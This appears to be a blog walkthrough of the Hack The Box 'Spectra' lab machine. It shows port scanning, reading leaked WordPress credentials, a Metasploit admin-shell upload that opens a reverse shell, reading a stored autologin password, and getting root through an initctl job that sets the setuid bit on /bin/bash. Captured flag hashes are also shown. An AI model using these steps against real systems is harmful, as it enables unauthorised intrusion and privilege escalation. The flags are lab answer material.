Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.229 | TCP:22,80,3306 |
$ ip='10.10.10.229'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 5247de5c374f290e8e1d886ef9234d5a (RSA)
80/tcp open http nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql?
Path Traversal && Wordpress Plugins Reverse Shell
# echo '10.10.10.229 spectra.htb'>>/etc/hosts
$ curl http://spectra.htb/testing/wp-config.php.save
username:devtest
password:devteam01
http://spectra.htb/main/
http://spectra.htb/main/wp-login.php
username:administrator
use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME administrator
set RHOSTS 10.10.10.229
set TARGETURI /main
set LHOST tun0
set PASSWORD devteam01
run
$ cat /etc/autologin/passwd
SummerHereWeCome!!
$ ssh katie@10.10.10.229
User.txt
e89d27fe195e9114ffa72ba8913a6130
Privilege Escalation:initctl
$ scp katie@10.10.10.229:/sbin/initctl ./
initctl 是一个用于管理系统初始化进程的命令,它通常用于系统的启动、停止、重启和管理系统服务等操作
$ cd /etc/init
列出服务状态
$ sudo -u root /sbin/initctl list | grep test
$ sudo -u root /sbin/initctl stop test
description "Test node.js server"
author "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
chmod +s /bin/bash
end script
$ sudo -u root /sbin/initctl start test
$ /bin/bash -p
Root.txt
d44519713b889d5e1f9e536d0c6df2fc
扫一扫
2217
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
